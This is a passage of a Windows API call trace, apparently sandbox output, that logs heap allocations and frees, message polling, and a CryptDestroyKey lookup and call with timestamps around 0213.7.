Flags=0x0, Size=0x10) returned 0x2e50890 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0213.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.697] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.697] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50770, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0213.697] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.698] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0213.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0213.698] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0213.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0213.698] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0213.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0213.700] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0213.700] CryptDestroyKey (hKey=0xa87290) returned 1 [0213.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0213.700] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0213.701] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0213.701] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0213.702] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0213.702] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0213.702] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.703] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0213.703] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0213.703] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0213.703] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0213.703] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0213.703] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0213.703] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50848 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0213.704] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0213.704] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0213.705] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0213.705] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0213.705] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0213.705] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0213.705] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0213.705] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0213.706] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0213.706] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0213.706] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0213.706] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0213.706] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0213.706] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0213.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0213.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0213.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0213.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0213.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0213.707] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54260 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0213.707] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0213.708] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0213.708] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0213.708] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0213.708] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50590 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0213.709] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fea0 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0213.709] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fea0 | out: hHeap=0x970000) returned 1 [0213.709] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0213.709] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 